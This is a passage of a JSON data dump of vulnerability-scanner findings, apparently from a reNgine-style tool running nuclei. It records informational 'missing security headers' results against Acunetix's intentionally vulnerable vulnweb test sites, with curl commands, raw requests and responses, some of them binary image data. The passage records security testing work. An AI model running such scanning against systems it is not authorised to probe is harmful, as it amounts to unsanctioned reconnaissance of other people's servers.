\tN\u001eop�/�R��\u000eGF�DhF�6:�M2ѻ�[��\u0001SZ\u0012�Ǻ�C�Akv��Q\r�\u0018:�H��D*]�U�H\n�II\u0013\u001bH\u001e\u0015�nQn-`(����G\u0010�\u0013�v��\u000e����5a\u0017�D����u���x�\by���\u0002#��\u001bT��J�z�\u0007Q��c_�Y%L(%o\u0010hu�7\tZb\u0012�"u��H�Tn\\�ܽVT\u0015+�\n�\u0012\u000e��X�踸jє�\u001a�~�뫺ZD���c0\u0004\u001f�W�d.��Iq3m`��c9\u0019\u001bo��Y>C���-�%���d����'X'�O��[��n�ajNl��\u0001������f�:V��ʄ'a�km$�\u001e��S\u0002�y�\u0015\u0003A�_€a�.�\u0001�!#���J�I�N�����g �Guk�q`\u0010��-�/1\n'y��/4�25\u0006x�\u0014��\u0010u�\u001ba�`%:�G\u00045�3j��H8��\u0004��PU�'¶1|=~��[Z\u0003-���:�y���\u001d\u0012e-\u0002�$�� \rD�υ[�R�c\r-)!\u000f9�W08\b�|�\u0014�7VȄX&(ղ�s\u0002\b%*�\u001fޝ�\\e\u0018��Wn���O>:���&�\n\u001c$fȭ��@�\u0002� (F�)�˽Ir\u0017$�٣qg\n��\u0019�\u001b����T�\f\u001f�\u001c�6�����(��'.i�׉�����ʙ�;q��S���FRM�J�R\t�\u001b�\u001fÊ�*���0EJ���� \u000eU�\u0002�\tY�䟥[w�\n�Ӑ�P��W\t5��6�\u0001eAGI\u001a\u0011�UD)eq$�w�|�VR\u0012�\b�t"L�Ƅ��\t�ڛ��L�s\u001e4�|��\u0001\u0001�\u0001���J�2�G7*����&\u000e�\nT��<\u0012����vaCj����*p��\u001b�#�TEڒ������M\u000f=�B�'bi�)?\u00029�y-�.V���\u0004�́���]�:�\u0015��4����rgi֚�\u001f��U��:xҚ\u0007�\u0012�p�У�S�\rj�M���\u0006�x\u0011�R�O�uQ<�Y�\u0014��J�O}3�Q�懲\u0015�ҖH\u0003��L٥e!*�xD�a\t#:\t���J�\u0010��\u001c��&*�)"�(ˆ\u0014aL\u000b\u001bR��\u001a�\u0010A(<x��P�J�Uqrd�5#6�'�Z\r::��\u0010L�sN���"��w��²z�m*�4�7&\u0016gp5=��R��*A�P����h��ي�ՙ�*%i@$�`i�k!�!S\u001a�|�ҥ\\�\u000e��$\u0014�\u0002t�j\u00022�@m R�W�1f̤�����\u0017�\u0012��p��J�\bԵ(�cz������iR�PV�\f�y%m���\u001fqS%\u00031\u001e?*T�>E\u0011\u00039\u0011�>�j�\t�>�R�Q\u0001�N�\u0014�z�@ޕ*Ҹ2ˑ�\u00026\u001bTKBH:R�Q�\u001c[I))\u0012\u0007q�LI\u0001\u000f\u00109q�J���j��4���P��\\P\u0011=��Uf���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 976, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/5.jpg.tn", + "discovered_date": "2024-11-13T02:42:41.188Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/5.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4428\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:12 GMT\r\nEtag: "4dca64a1-114c"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001b\u0002\u0003\u0001\u0001\u0001\u0004\u0002\u0003\u0005\u0001\u0007\u0006��2\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0004\u0006\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011\u0004\u0012!1AQ\u0013"\u00052aq\u0006\u0014#B����R�\u0015b�r��\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0001\u0003\u0004\u0005\u0006\u0007��/\u0011\u0001\u0003\u0002\u0005\u0001\u0007\u0004\u0002\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!1A\u0013Qaq����"���\u0006�\u00142���\f\u0003\u0001\u0002\u0011\u0003\u0011?�\u001a�d�������0�V\u0015��gQ�%XmƲ ��Tg6�ru�Ʋ0��G\n>2y��d�EV\u0019m}3�1��<*������qY\u0016`��d��6�k"�w��r�{0�qY.��\u0019*>3��F\u001e\u0013u�\f�\u000f\u0018�Du2i��h.�H�2��\t\u0019^Ӗ�.z*�J��\u001d\u0014\u0002�@2ء\u0012\t\u0018=�+\u0012T\u00176.�-��EcZA\u0012,�*�!\t\u0003o\u0007�:�<��x����Fh�u�'\u000b\b6\u0001&�\u0003��\f4\r�|�Ӽ�@\u0005��>[$LL\r2Ѡ���\u0019ƈ���Ӆ�����\u0007�=N��2<t�R�*Xr�r�\u001d8?+\u000b�#2H��1�\u0012D�ሠ\u0006�6�9\u0006�o�}�\u0001`ֻV�V\f���./c�Y�p��4�z\u000fH�\u0011V\n��\u001b��u�\u0012)X\u0005�n��:��aU\u0004��\r?�?�\b�\rm^�����\r}��\nF�\u0019��I\u0004J�\u0015:�\u0003�d�?��SϬ��$!�j\u0004�6�_�_\u001fk�\r\\��UM4�(\b\u0016\u0017$����t���x$\u000e\u0019\u0003q�#ʚ�>�+\u001a9�3�;V��8��c��Lz\u0007Ӽ�6�53�\u0012�eZ8\t4\u0018���J�\u001c\u000e��4�@��M��1���\u0005EF�r9*H�(qV\u000b���,�q��������m��%� �\u0006�B�p�\u0004�1b\u0010��j9$�}?���,[M���\u0001\u001b�kQ\u001dױ�`�+l�iqf����Ww�%+\u0018���]���$�p/8󿡣�@���r�E�k\u001d�6<�\b��c\u0006�IYX���/�q��R:\u0018�5\n^%e\u001eǐ�\u0007��U}��<��&��R��)\u0012H��\r���<�9�&�W�I6�?a?9���!�uR��51>�\u000e��\u001e\u001dDl-8;ā����6\u000f?B\u001b\\n�jꧠ��q~c��i����$SH�\u00132L�@�W�*ё�f�z��+��m9���\u0014�b*��V�Z4o���V��\u001a�ٷJʭ�H�����\u000ex��\u001b�(��%�;+��U0��XKo���hi�\r4~��~`��(b»�z׎����h@`���6�eGݶ��V\b�\u0005�ʦ���6���\r�;�\u001d\t�@��s�C\u0014r�R3\u001f��2\t\u0014i���TG�:\u0010\b���B�'�(\\e�p� |�R�.�\u000b���t\u0005��\u0002C��7\u0016���"����8�\u0007M�E$,�&\u0014\u000e�<�\u0007��\u001d\t�4�JҼ�~��9jC,d�ف\u001c\u0001�;�]�\u0007kZ߇��P��\u0015�2�(k��/�\u0011�M���:�d�N�����林ԝ�CpX��8�/�\u0016<�\u001c�8������'�kkb�u\u0011G/�^O�T\u0014x�}Gׯ�Š�sJ\u0015�e\n�w�ZW�\r\u001e/�W{]{\u0005��UQ22]a}{�>]OK��F�*D&�7;��{��Q\u0010���C�P�G����v(\u0001��O8�ZWi��\u0001i#4֥A�ш��sW]��\u0013$�4N\u001fiV�n�\u0006\u001c��\u0010~��9#\u0001:\u0015F�H\u0003���\u0001��S���"��A%��x��\u000fw5���\u0003*�\u0003\u0016�IY�HY\u001byqE@��5��o�۾��\u0012(U_dP�V4-)$�J,�l�"��ךˌ\r,pƞ�s���\u00197B��-�C�m��\u000f\u0016\r��B�f�\u001b\u0014����\u001fE�ڄ����18��\u001d��UoU��"�оؤӳ0\u0006�p3cT����#�5\r$6x�\u0010z�&ʶ�Th\u001a#�V-\u0002j\u0002\u0015\u0005\t��\t\u0014M_#�\u001b�\u0005\u001e/+�óJ���F���%�K��R�F�*�2����~��hi�%d�4�Ez�\u0015BG�\u0006�5`t�\u0003�������*��I�\u000eù�9<e��@����xԊfQVv�@�]��xÂ��zI��c�\u0005u�A#*:�B\u0003Q�M\u0003G�DgSB���ޑ3����Z��\u0001�y\u0001�t錬\n�$��]\u0001\u0004�ˎ�x�\t��Y�\u0002��:d\u001a�A\u0010�f�\u001c�-�{�-tv݁���V2�.W5Y�\u0018\u000bKέ��,yt蓕�U��fP�[o�]\u0001aۥu'\u0011\u0012)��+\u0017ݹ\u001c8*\b,\b�{w\u0007���I�]\u0013Țy�\u0012eYD�C!dV\u001e�\t5�A�\u0002��\u000eT�B}k��1�2�K\u001f\u0014��.k\\30��F.ڗ\bݭ�}�j�,o�[\u0013\u001b\u001c�\u001a�<Qʂ�ov]�`�n��\u0012mH��^�古T�|r��]�\u0002O\u0015�u'�\u001c���������$�\u00166�rgK��]��\u0019����:�\n_;��}�\r�j\u0010�����sn�N�]��뷋��L�L�E\u0014Q�Wolq�v\u0002�/h#ڶ;��rT\u001b����1X�{I{@��d��d�\u000fóG�D�j�(Ν��\tm\u001f1a@��r7X\r^E�@�t�!�U�+\u001bI��GP\u0019�\nwn��\u0010\u000f\u001b�b\u000fZ 篡�ӟO<���bd(����i�n��o\u001b���q��������7z\u0016#�U���������fe^\u001a���.kYrQ�4E�5����d��\u001c\u0002NԠ�\u0010��$w��O�0$\u0012��x���L���\u0004��.�lR�c�H5���Ŭ1��Y\n�\u0006�\\\u0005\u0003�_<�n�՞2��'u�84s�B\u001a��i��J\u0002�*�GI1�a\u0011�6�T��\u000b*�\u000bW�\u001f�~���P`��P��ۻ1w��fbI�9���h��\b����\u0015QI&�\u0001G=z<��\u0015_\u0012�i\u0001/c@��ZS�H��b\u0012��\u0018�K�`R9w,G\u0002\r_S���K�ַZ��~!9�4��5Dc܇jPF\u001cݐ�l}�{4���锉��*fm�����׻h\u0015f��\u0019{z!��\u001d8W`_���\u0005�W`C��o�=M�\fG\u000fu`\u0001���\u0010\u0019%<��fk����I/�4_\u0001�/�f_�,(�HǫРM�=\u0005�?z�mY;����\t\nzu��篃]\u000em|GYꬔ�B�%MY՟�\u0017]<�kkUQ\u0015���V76�D�������\f�������/�p�M\u0010!����o��J�[�;\u001b\u0004_RB�#\u0005��@�� �=8$_�p�Y\nV�2\u0016�%��\u0007��yѨgӘ\r\u0018�=7W��\u001f�\u0016�|\u001b=1��b�+�<�� <O�j�\u0003V玎�+~�Q����x���\u001d��?\u0010O,_��'��C\u001bN�b�<�n\n\u0018��n��\u0018�\u0015d_��N\u0011��;�\fȼ���͑��{4�tq�:HF�I57"�\f�\u0013a�F��������B��'$���\u0019cy^��8���\u001e6�^E�\u000e_����ru��La��\u0019�6�\r\u0005t$\u0017b�\u0016�kn9�U���?�U�m�\u0015��O5|�z#��;.��Ԛ�i*���v�b\u0005� ]mcԟq��\f�l��\t%E�\u001c�'?��O\u0007�'��)�њ8�\u000b�u\u0006�Y���nQ�ߥ�9��\u0002\r\n��W\u0015�����i�u�qFY�)U�n��\u0002��ӽ\u000b$�,~f#(t��87���G>*�}z��/{�@5S��z\u0016�\n�!f�H�\u0019\u0002m\f�6��n�\u001b`\u0005�NVȻ\u0013�9\u0004��]����7W�,�,��_zG\fP@�!�\u0004h��\n\u0005\u0001}�;�p�,��d��Z�O\u0003�j<�t�\b�A2\u001a�\u0013|u�+��*�S�Ԑ\u0011�3���������h��?A�V2\t�,�\u0015��*���A�Zy����d'k*�-�M����n�\u0007��\u0016E�S\u0011C\u000b�%���_�}�50j\u0016#�i�ƀ���W�U��j�y�1\u000b\u0006��\u0013��$��2Q�uA��P��I�2i=�\u001b��\rq�h�P+�\t��$��\r$���x�`��\u0001\u0007�\u0004U����p\u0004E�Ԅt8�Dl!����\u000e��\u0016���%�j&�\u001eÓҸ\u001c�\u0005��uh�eT\by��ہ\u0016v��]��;���k�^��/#6�����l�\b\u0015`\u0002�x\u0007�8�{<�\u0007\u0006�\u0015���ZD�\u0002Á�Z�Yv�3X�x�]�\u000b9:v����\u001c\u001fo��*�t������l'���\u0015d�)�XC����A?�[�;\u001e0̆�\u0006���{$�:\u0011~E�\u001eˌE_�:�cd�6����@\t x\u001f�ZX�0���r\b�\u000b&�X5q��W��\u00114!Ķ(\u000b�P�\u0015�!`�\fQP��\u0016]���S@(n�\u0015<�?sB�h����=\u001e,�&�63��׿mO�ȅ\t I�C\u001c��\u0010�ɽ�ŀ꠆�u\u0004\u001a�#��|�`j��T�\u0014h�1=�\u0004W ݃�&󷦱�fU\u0014\u000b��#�O'��F�>y�\u0013�1���|�&U\u0004�`,{�\n8�g�$���N�!sjň\u00062�]\u001b����Uu�s����s�`t%�T�\u001bzr���\u001bd$h�����&�鿱Q��Z2��J�E3�.��#���\njd3\u0015�L��R�E��d�\u001cw<p:_$N҅�Nc\u0006��\nO���T�5\b�G#iF�\u0011?.����@������Y�y\u001c�̞h*gf\u0014�3-�N��#B;��z���b\u00074t�E�P�ʦ3 ��v��H\u0004\u000b�\u0016y=,���\u0014�"x�\u0002�����J�\u0005J�<�$�\u0004U^Dح�כ\u001dc�c\u001aK��K_���9^\u0018�W�aZ�]��Զ’\u0002�T�\u0006(y��\u000f���9c\u001c<�\u0014���,�t��Y��_o\u0019\u0016������7��b�T��cma��q�Y�^\u0017��N#V+�q�.�C"���L\b�M��:\u0002~�k�|�}�xA�*���8����Y\u00022�*�\u0004\n6��\u0001�\u0003���\u000e+�I\u001e�T\u0004\u0006�*�t�/8Xb��\f�akr��V4��$���Cvp��.W�\b\u001a�\r��5F\u0016�7F�o[�\u001d�#��w}1��n\u0010MHٛ���k��L�,Z��\u0005\u0014Esȫ\u0007�:x�k�U��h�~ߘ���^*��\u0019��8X���|x4L:�Ga����]Z�\u001b,jC9�!�\u001e\b����ŞVaL���Qg9~p\f��+���\u0019�\u001a��l�p�\u0018�Q�\f1'F\u0018a�$g\u0018�\u0018c\u0014�u\u001d��o�\u0018bR���\u0018`�F\u0018a�$a�\u0018�Fr�\u0018bF�a�\u0018(���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 977, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19", + "discovered_date": "2024-11-13T02:42:41.440Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /wvstests/pmwiki_2_1_19 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:25 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /wvstests/pmwiki_2_1_19/</title></head>\r\n<body>\r\n<h1>Index of /wvstests/pmwiki_2_1_19/</h1><hr><pre><a href="../">../</a>\r\n<a href="scripts/">scripts/</a> 08-Apr-2013 08:44 -\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 978, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 112, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://www.vulnweb.com'", + "type": "http", + "http_url": "http://www.vulnweb.com", + "discovered_date": "2024-11-13T02:42:41.696Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: www.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:26 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 979, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36' 'http://testphp.vulnweb.com/wvstests'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/wvstests", + "discovered_date": "2024-11-13T02:42:41.968Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /wvstests HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:27 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /wvstests/</title></head>\r\n<body>\r\n<h1>Index of /wvstests/</h1><hr><pre><a href="../">../</a>\r\n<a href="pmwiki_2_1_19/">pmwiki_2_1_19/</a> 08-Apr-2013 08:44 -\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 980, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 1, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' 'http://vulnweb.com'", + "type": "http", + "http_url": "http://vulnweb.com", + "discovered_date": "2024-11-13T02:42:42.240Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:26 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a 